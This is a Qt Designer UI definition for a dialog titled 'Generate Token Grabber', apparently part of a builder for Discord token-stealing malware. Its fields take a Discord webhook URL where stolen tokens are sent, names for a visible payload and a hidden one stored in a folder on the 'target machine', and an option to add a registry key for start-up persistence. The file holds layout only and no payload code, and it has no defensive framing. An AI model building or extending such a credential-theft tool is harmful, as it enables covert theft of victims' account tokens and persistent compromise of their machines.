<?xml version="1.0" encoding="UTF-8"?>
<ui version="4.0">
 <class>dlgGenerateTokenGrabber</class>
 <widget class="QDialog" name="dlgGenerateTokenGrabber">
  <property name="geometry">
   <rect>
    <x>0</x>
    <y>0</y>
    <width>540</width>
    <height>440</height>
   </rect>
  </property>
  <property name="minimumSize">
   <size>
    <width>540</width>
    <height>440</height>
   </size>
  </property>
  <property name="maximumSize">
   <size>
    <width>540</width>
    <height>440</height>
   </size>
  </property>
  <property name="windowTitle">
   <string>Dialog</string>
  </property>
  <widget class="QDialogButtonBox" name="btnBox">
   <property name="geometry">
    <rect>
     <x>370</x>
     <y>370</y>
     <width>151</width>
     <height>32</height>
    </rect>
   </property>
   <property name="orientation">
    <enum>Qt::Horizontal</enum>
   </property>
   <property name="standardButtons">
    <set>QDialogButtonBox::Cancel|QDialogButtonBox::Ok</set>
   </property>
  </widget>
  <widget class="QLabel" name="lblTitle">
   <property name="geometry">
    <rect>
     <x>20</x>
     <y>20</y>
     <width>341</width>
     <height>31</height>
    </rect>
   </property>
   <property name="font">
    <font>
     <pointsize>18</pointsize>
    </font>
   </property>
   <property name="text">
    <string>Generate Token Grabber</string>
   </property>
  </widget>
  <widget class="QLabel" name="lblWebhookURL">
   <property name="geometry">
    <rect>
     <x>20</x>
     <y>70</y>
     <width>511</width>
     <height>16</height>
    </rect>
   </property>
   <property name="text">
    <string>Enter a Discord channel webhook URL (this is where tokens are sent)</string>
   </property>
  </widget>
  <widget class="QLineEdit" name="leWebhookURL">
   <property name="geometry">
    <rect>
     <x>20</x>
     <y>90</y>
     <width>501</width>
     <height>20</height>
    </rect>
   </property>
  </widget>
  <widget class="QLabel" name="lblFolderName">
   <property name="geometry">
    <rect>
     <x>20</x>
     <y>130</y>
     <width>511</width>
     <height>16</height>
    </rect>
   </property>
   <property name="text">
    <string>Enter a folder name (this will be made on the target machine to store a hidden payload)</string>
   </property>
  </widget>
  <widget class="QLineEdit" name="leFolderName">
   <property name="geometry">
    <rect>
     <x>20</x>
     <y>150</y>
     <width>501</width>
     <height>20</height>
    </rect>
   </property>
  </widget>
  <widget class="QLabel" name="lblRegularPayloadName">
   <property name="geometry">
    <rect>
     <x>20</x>
     <y>190</y>
     <width>511</width>
     <height>16</height>
    </rect>
   </property>
   <property name="text">
    <string>Enter the regular payload name (this is the name of the payload the target runs)</string>
   </property>
  </widget>
  <widget class="QLineEdit" name="leRegularPayloadName">
   <property name="geometry">
    <rect>
     <x>20</x>
     <y>210</y>
     <width>501</width>
     <height>20</height>
    </rect>
   </property>
  </widget>
  <widget class="QLabel" name="lblHiddenPayloadName">
   <property name="geometry">
    <rect>
     <x>20</x>
     <y>250</y>
     <width>511</width>
     <height>16</height>
    </rect>
   </property>
   <property name="text">
    <string>Enter the hidden payload name (this is the name of the payload hidden in the folder)</string>
   </property>
  </widget>
  <widget class="QLineEdit" name="leHiddenPayloadName">
   <property name="geometry">
    <rect>
     <x>20</x>
     <y>270</y>
     <width>501</width>
     <height>20</height>
    </rect>
   </property>
  </widget>
  <widget class="QCheckBox" name="chkHavePayloadRunOnStartUp">
   <property name="geometry">
    <rect>
     <x>20</x>
     <y>310</y>
     <width>501</width>
     <height>16</height>
    </rect>
   </property>
   <property name="text">
    <string>Have payload add new registry key to run on start-up?</string>
   </property>
  </widget>
  <widget class="QLabel" name="label">
   <property name="geometry">
    <rect>
     <x>20</x>
     <y>410</y>
     <width>491</width>
     <height>16</height>
    </rect>
   </property>
   <property name="text">
    <string>(Please ensure all folder/file names follow Windows conventions)</string>
   </property>
  </widget>
 </widget>
 <resources/>
 <connections>
  <connection>
   <sender>btnBox</sender>
   <signal>accepted()</signal>
   <receiver>dlgGenerateTokenGrabber</receiver>
   <slot>accept()</slot>
   <hints>
    <hint type="sourcelabel">
     <x>248</x>
     <y>254</y>
    </hint>
    <hint type="destinationlabel">
     <x>157</x>
     <y>274</y>
    </hint>
   </hints>
  </connection>
  <connection>
   <sender>btnBox</sender>
   <signal>rejected()</signal>
   <receiver>dlgGenerateTokenGrabber</receiver>
   <slot>reject()</slot>
   <hints>
    <hint type="sourcelabel">
     <x>316</x>
     <y>260</y>
    </hint>
    <hint type="destinationlabel">
     <x>286</x>
     <y>274</y>
    </hint>
   </hints>
  </connection>
 </connections>
</ui>
